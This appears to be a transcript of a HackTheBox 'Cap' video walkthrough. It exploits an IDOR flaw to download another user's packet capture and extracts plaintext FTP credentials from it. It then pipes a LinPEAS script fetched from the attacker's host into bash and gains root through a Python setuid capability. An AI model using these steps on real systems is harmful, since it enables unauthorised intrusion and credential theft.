What's going on YouTube? This is Ipsec. I'm doing Cap from HackTheBox, which name is extremely relevant to the challenge because the foothold is based upon a packet capture and then the privesc is based upon a capability. It starts off with finding a web page that allows you to download some packet captures that are created around your session, but you can download other people's packet captures by just guessing the ID. So your packet capture is probably like 1, 2, or 3. If you just go backwards and try like 0, you can get a packet capture from admin, which is just the FTP. So you can view the packet capture, extract the FTP password, log into the box, and then running LINPEAS, you'll find out that Python has the setuid permission or setuid capability. So you can just open up Python, import OS, and do os.setuid0 and get root. With all that being said, let's jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put it in the nmap directory. And then we'll call it, I think cap is the name of this machine, and the IP address is 10.10.10.245. This can take some time to run, so I'm just going to run this with the -v flag, so it shows me open ports as it finds it. And we can see right off the bat we have 22, 80, and 21. 21 is FTP, so it's super quick to test. The very first thing I like doing is just netcatting to it, so 10.10.10.245, port 21. And this gets us the banner. We see vsftpd version 303. So we can do searchsploit vsftp, if I can spell that correctly, and spell searchsploit correctly as well. And we see there's only exploits for 2, 3, 4. I probably would look at like the release date for this as well. So we can probably just go to Google and say vsftpd. Changelog is a good word to often get the dates that versions were released. And we have something right here. So let's see, what is this? 303. So the changelog updated version 302. I wonder if there's a different place we could be getting this from. 02 versus 303 changes. So we can see this was released. Doesn't have a date that I see. Increase, let's see, this is an email. Don't really see anything. If I click this, does this get me to a repo? It does tell us 305 is the most up-to-date version, but I'm still having trouble finding a date on this. What I'm going to try doing is wgetting this file, and it's key to use wget. If you just save it with Firefox or something, you're not going to have this thing. So I'm going to run exif tool, changelog, and let's see if this has a old date. 2015, July 25th. So this is probably around the time that 303 was released. We could go Googling more, but I'm going to take that as the release date. If I use curl and we do this, I don't think you see that. Yeah, curl does not preserve this by default. So that is why I used wget. But that was a huge kind of rabbit hole. FTP doesn't change all that much, so seeing it to be like 6 years old isn't really that big of a deal, especially a major package like vsftp. Additionally, searchsploit doesn't really have anything for version 3, so I'm just going to assume this is secure, and that's why I kind of move on. So we've done enough where nmap should be finished, so we can look at the results. So nmap cap.nmap. And the other thing I would be testing is anonymous login. So we could just do FTP 10.10.10.245. If we try anonymous, the theme of this video is apparently going to be spelling, but we try logging in, we can't get anonymous, and also nmap does that by default as part of one of the default scripts. So I don't think we can really do too much more with FTP. We could try setting up like a brute force and trying to brute force a username, but again, well, with the brute force of full credential, we don't even know the users on this box, so that's why I'm not going to start doing any type of brute forcing. If I knew a username right off the bat, probably would have just set up like Hydra or something to brute force that. SSH tells us this is a Ubuntu box. We have gunicorn running on an HTTP server, which kind of tells me this is not going to be PHP. gunicorn is often for Python apps. It may be used for other things. Let's see. Is it only Python? Let's see if it says Python on their homepage. It is only Python. Python WSGI, Web Server Gateway Interface. I believe that's what WSGI stands for, but it's how you have Python be a middleman. Normally you put like Nginx in front of G-Unicorn, but it is just a web server for Python. So it is a Python application that we are looking at. So 10.10.10.245, let's take a look at this. And because it is Python, I don't have to worry about it being like WordPress, Joomla, Drupal, all those like PHP applications. And looking at this, I'm going to guess probably Flask. The two frameworks you generally meet with Python are Flask and Django. And Django does have a default page. I think it by default will create /admin. Django's like a lot more feature-rich of a framework than Flask is. Flask is pretty minimal. And Django has built-in like user management and things like that. So it not having /admin, I'm thinking this is Flask before doing anything. So let's take a look at what we can do. Oddly enough, we're logged in. So I'm going to look at cookies. So I'm just going to storage, and we don't have anything. So this is a weird app. If I click this and try log out, it goes nowhere. We just have this anchor text. So there's not much I can really do from this point. So I'm going to click on security snapshot to see what else is here. And then I'm going to do control and click on the other two things. So this we have /data/2, and we have a PCAP. So I'm going to download this. And then I'm going to look at other things. So this is network input or output. It looks like the output of ifconfig. If I do ifconfig, you can see very similar output. I'm trying to think of how to get commands. Maybe I'd like fuzz this and do like cmd equals ls and try understanding how this works. It looks like it's just a static page. And as I say static page, probably not, because here is me connecting to port 80. If I do a connection to port 22, SSH 10.10.10.245, and we refresh this, we should see me also connecting to 22. There it is. So not a static page, but it doesn't look like there's a way for me to change the command. So if I get stuck, that's probably what I'm going to revisit and use wfuzz to see if I can fuzz any type of hidden commands. Just refreshing this, like glancing through all the things, nothing. We could also try other commands. So we could try doing a dirbust. There's IP, there's netstat. We could try like ls, see if it's just doing commands. The reason why I'm not really going down this route is while this is the netstat output, this is not the IP output. IP is a command. So if I do IP, we have help. I need to do like IP ADDR, and it kind of gets me the output this is, except I don't have the interface number here. So 1236, we don't have that, so we can confirm this is indeed ifconfig. So just knowing the output of commands right now. So let's close those tabs, and we downloaded this PCAP, so let's take a look at it. So move downloads to .pcap here, Wireshark to .pcap, and we'll see what we have. There is get/http. And is this me? Yeah, this is me sending data to the server. So that's interesting. It is trying to go for 2, so I'm going to try 1. And we actually get something here, so let's try 0. And this looks like it is an IDOR vulnerability. That's like indirect object reference. So there's no ACLs put around these URL pages. So if you just happen to guess it, you can access it. Like if I go to this capture page, if I go to capture, it looks like it may set up TCP dump. And that's what happens. Because I go to capture, it redirects me to data too. But we can download other user sessions if we just guess the ID. And this is a super common attack. Like, I think I mentioned it before, but like the DEF CON ticketing system vendor thing was kind of vulnerable to it because it gave you your order ID, which was sequential. And if you just decremented the order ID, you can get other people's ticket information. So again, it's a super common attack. Doesn't normally lead to like access to the server, but you generally get access to other features. that may be good. So let's do move downloads 0.pcap, and we can Wireshark this one, see if there's anything else. So this is a 192.168 network talking to another 192.168. So I'm going to follow TCP stream, and we can look at this. This is just a HTTP page. Let's do TCP stream equals 1. This looks like another HTTP. Right click, follow. So we can kind of view what it is. This is getting a CSS. Let's go to the next stream. HTTP as well. Control-Alt-Shift-T is the shortcut. So this is just responding with a 404. Go to the next one. Oh, we have FTP. So I press Control-Alt-Shift-T, and we have credentials. Nathan, and then bucket hat form 3. So I'm going to try that in FTP. So let's do FTP 10.10.10.245. Nathan, paste that password, and login successful. And we just have user.txt. We don't have like an SSH directory. I did dir here, hoping that there would be like SSH. I can make dir SSH, permission denied, so we can't make that. If I wanted to, it would have to be .ssh, but doesn't look like that exists. Bash history is pointed to nothing. Bash rc. We could try getting this and modifying it, but I don't think I'm user 1001. If I was this UID, I probably could, because that's the owner, read write. And I know I'm not that because I couldn't write the .ftp directory. And even if I was that, there is a chance I can't just write files because FTP could be configured in read-only mode. But again, not much I can do here. If I could edit bash rc, I would probably put a reverse shell there, and the next time the user logs into the system, he sends me a shell. But again, can't edit that file. So let's go and try SSH. Maybe he just reused that password. So SSH with this user. The other good files to grab are also anything beginning with a dot, like .vim info. Well, I think there's a .vim history potentially being created, a .bash history. Those are all good files to download. My clipboard is not what I expect. So let's copy that as a Control-Shift. There we go. So logging in with Nathan. And we have 4 zombie processes. We got some updates. Do an ls, user.txt, and nothing too much here. So let's run LINPEAS. So I'm going to make dir www, go in this, and then cp/opt, was it privilege escalation awesome suite, I think. There we go. Priv, there we go. And then we want LINPEAS and linpeas.sh. So we'll copy that there. And we have to do a web service or Python 3 http.server. And we can do curl 10.10.14.8/linpeas.sh. Pipe it over to bash, and we have to specify port 8000. So specify that. And now it is running. So I guess while that runs, we could take a look at things. So I'm going to SSH 10.10.10.245, specify Nathan, and let's see what I would look at right off the bat while that runs. Is it the wrong clipboard again? There we go. So my first thing is I want to check out the web server. So opt. We don't have anything there. Is it var www HTML, and we have app.py. So let's go take a look at it. We have Flask, which is the framework we guessed. And let's see, templates, auto reload, limiter. The main thing I'm looking for is some type of credential, like maybe it connects to a database. It doesn't look like it connects to a database, so there's no credential there. The other thing now I'm looking for is what that the IP and netstat page. So this is the PCAP. And the reason why is just because we haven't really looked that much at it. Let's see. As I say that, I was just reading this command, seeing if there's any way to get command injection. This is how it's doing the capture. So if I search for path, path is set by something that's not user. And then IP, let's see how it gets IP, request remote address. So we can't set any of these things. So I know there's no like command injection here because there's no asking for user input. So let's go to IP, see what this is. This is just doing, again, OSP open ifconfig, reading it and printing it. So there's no user input there, so we can't really exploit anything. Same thing with netstat. No user input, it's just hard commands. So that's why I'm kind of ignoring all these, because there's no place in this application for us to give input. We have data/ID, and this is where we're giving input to ID, but it's specifying it is an integer and not really doing that much. Let's see, uploads. So I was thinking maybe like directory traversal, but nothing too special here. It doesn't look vulnerable from first glance. Well, it's definitely not vulnerable because the ID is just a integer. So we can't really put ... or anything. If like we had Python, so Python 3, and we try a is equal to int, and we passed it a _1, we got error because that's not int. So you can't really be vulnerable to anything with just specifying integers other than that IDOR vulnerability. But now we kind of poked around long enough for LINPEAS to finish. So let's take a look at this. I'm just going to go search for my curl and then move up to look at it. And let's see, we got Ubuntu 20, sudo version 1831. That's the one thing we did not check. We didn't check about sudo. If we can just run sudo -l, enter our password. We know the password. Paste it in. I may not run sudo, so can't really do anything with that. Date and uptime, system stats. We have LXD. So again, LINPEAS is going to tell us, but I always just like double checking. So when I see LXD, I check the groups to see if I'm a member of LXD. If I am, then we can upload a image and then mount like the root disk to that image. It's much like the Docker thing. If you just go to ipsec.rocks and type in LXD, you can see me exploiting it on 2 different videos. CPU info, nothing too interesting here. Environment, virtual machine, yes. Unmounted file system. So processor, crons, sockets, whatever. There's a reverse shell. Cron jobs, E2 scrub all. I don't know what that is. That may be a normal one or that may be unique. So I'm going to take a look at it because, again, I don't know it. And let's see what this is doing. It looks like it's probably something standard. E2FS. I wonder if that's like a file system thing. Scrub all. And I just normally don't use that file system. What is it mounted as? That's the FS tab. SDA, it's a LVM. Not exactly sure, but don't know what that is. Doesn't look vulnerable. Placeholder, man. So no unique crons. These are services installed, the path, system timers. Everything here looks normal. .timer files, .sockets, again, nothing here. Really just looking for it to highlight something. That's just DNS, so nothing interesting there. Sudo L, can't find anything. Users. So users with a console, Nathan and root, so we don't have any other users. All users and groups, nothing. Last logon. Interesting enough, there is lab, but that user doesn't exist anymore. So I'm going to check out ls-la/home, and it's just Nathan. So, not sure. MySQL, Postgres, PHP, looking for a bunch of configs. rsync, this is just the default config. LDAP files. Oh, why did it just... Come on. It just jumped all the way to the bottom for me. OVPN, nothing. Permit root login. Let's see, cloud init files. That's in Snap. Normally the things within Snap are not too interesting. It's like a package manager, so users aren't really editing these files, so it's not interesting because it's just from the image. Chrome, bind. This is an easy box, right? It should be somewhere here. So these are setuid. So I'm looking for anything that is out of the ordinary. All these look to be standard. Set GID. It's highlighting at. I don't know why. It's not highlighting the whole thing, so I don't think it's a vulnerability. It's probably just it grepping wrong. So we got capabilities. And right here we have something. So we have Python 3.8 capability set UID. So it looks like we can use Python to set UID. And if Python's owned by root, we can probably set UID to root. So let's look at lsla user bin Python 3.8. It is owned by root. So let's try this. So we're just going to run Python 3, and we want OS, and is it os.setuid? Should be integer, not string. So os.set. Well, before I do this, let's do os system ID. So we can see. Why did I print 0 at the end? Does it just do that every time? Who am I? Okay, it's always printing 0. It's probably like the exit code. Not sure. But we are Nathan. So if I do os.setuid 0, we do this who am I again, we are now root because we issued the setuid command. So we can just do os.system sh. Now we drop to a root shell. I can go cd/root. And we can access this file. So root.txt. And there you have it. That is the box. This was a lot quicker than I expected. I normally like my videos to be at least the half-hour mark. So let's go play with this PCAP a little bit more. So generally in CTF challenges, I don't use Wireshark. It's just great for the video. But what I would do is use Zeek. And I do -h. We need 2 flags. The first flag we need to do is kill checksum, so -C. And then the next flag we need is read file. So if we do, let's make the PCAP MV, well, yeah, MV stir to PCAP. Oh, I meant to do stir.pcap, so let's just move these files out. There we go. And let's try Zeek, no checksum, read file, stir.pcap. And I wonder if we can only do one at a time here. There's probably a way to do a directory. 0 is the interesting one. So I'm going to do 0.pcap. And we have all these lines. So this has just parsed the pcap for us. We can look at like connection log, see what it is. We can do FTP. And, oh, by default, Zeek is hiding this. So we can't see the password by default. The reason for this is a lot of people may have it on like a seam and send these logs over to some type of indexer where people can view. And you generally don't want to put passwords in Splunk, Elastic, Graylog, things like that, because if someone gains access to it, they get the password and it's a bad day from there. So by default, Zeek will do things like hide passwords. So if we locate FTP grep for Zeek to look for this plugin, we can edit this. And if you have trouble installing Zeek, there should be a video on it, right? Yeah, we got Scavenger. I'd take a look at this video to understand more about Zeek. But we can see there is a FTP one here. Let's see, it's probably main. FTP main, password. Let's see, password hidden. That's not what I want. Let's try info.zeek. It's getting info out of the PCAP. And we can see it here. Option, default capture password. It's set to false. Change that to true. And I probably have to be root to do this. And then we're going to run Zeek again. So let's do Zeek-cr 0.pcap on ftp.log. And now we have Nathan and the password. There is Zeek cut, I think. Is it bro cut on here? Zeek. I would look at this video. I don't know what this binary is. I have it there as Zeek cut, but maybe I don't have it here. Let's see, can I install it? It's probably like Zeek utils or bro utils that I'm missing a package, but if you want to know more, I'd look at those programs, look at this video, because this is where I actually prepared to talk about Zeek or bro IDS. I don't know it just off the top of my head, but if you have the Zeek cut thing, you can just do Zeek cut user password, and it'll automatically print these two strings for you and just hide all this other stuff. But that is how I do it if we had a lot more data on the PCAP. So hope you guys enjoyed the video. Take care, and I will see you all next week.